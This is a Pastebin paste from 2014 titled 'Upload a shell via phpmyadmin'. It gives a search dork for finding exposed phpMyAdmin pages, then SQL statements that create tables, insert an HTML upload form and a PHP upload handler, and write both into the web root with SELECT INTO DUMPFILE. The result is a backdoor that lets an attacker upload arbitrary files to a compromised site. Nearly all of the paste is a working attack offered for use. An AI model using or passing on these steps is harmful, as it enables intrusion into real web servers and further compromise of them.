API tools faq
paste
Advertisement
LionHack

Upload a shell via phpmyadmin - by LionHack

LionHack
Jun 9th, 2014
13,765
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
raw download clone embed print report
  1. Upload shell via Phpmyadmin by Lionhack - from Hackerschool fr and Altui.
  2.  
  3.  
  4.  
  5. Dorks : allinurl:index.php?db=information_schema
  6.  
  7.  
  8.  
  9. CREATE TABLE `DB NAME`.`userform` (
  10. `track1` VARCHAR( 1000 ) NOT NULL
  11. ) ENGINE = MYISAM ;
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19. ...........................................................
  20. CREATE TABLE `DB NAME`.`user_upload` (
  21. `track2` VARCHAR( 1000 ) NOT NULL
  22. ) ENGINE = MYISAM ;
  23. ............................................................
  24.  
  25.  
  26.  
  27.  
  28.  
  29. insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  30.  
  31. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  32. <html xmlns="http://www.w3.org/1999/xhtml">
  33. <head>
  34. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  35. <title>HackerSchool Fr - Altui</title>
  36. </head>
  37. <body bgcolor="white">
  38. <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
  39. ">&gt;&gt; &nbsp; *HackerSchool Fr - Altui* Upload Your file </div>
  40. <div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
  41. <form enctype="multipart/form-data" action="upload.php" method="post">
  42. <input name="userfile" type="file" />&nbsp;
  43. <input type="submit" value="Upload" />
  44. </form>
  45. </div>
  46. </body>
  47. </html>');
  48.  
  49.  
  50. ......................................................................
  51.  
  52. select * into dumpfile '/opt/lampp/htdocs/filename.php' from userform
  53. .......................................................................
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66. INSERT INTO user_upload
  67. VALUES (
  68. "<?php $uploaddir = '/opt/lampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
  69.  
  70. (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div
  71.  
  72. align=center><font size=5 color=#ff0000>HackerSchool fr- Altui | uploaded successfully</font></body>'; } else { print '<body
  73.  
  74. bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000>HackerSchool fr- Altui| Error !
  75. </font> <marquee> Lionhack </marquee> </body>'; } ?> "
  76. )
  77.  
  78.  
  79.  
  80.  
  81. ........................................................................
  82. select * into dumpfile '/opt/lampp/htdocs/upload.php' from user_upload
  83. ........................................................................
  84.  
  85.  
  86.  
  87.  
  88. NB: /opt/lampp/htdocs/ ... is the website
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!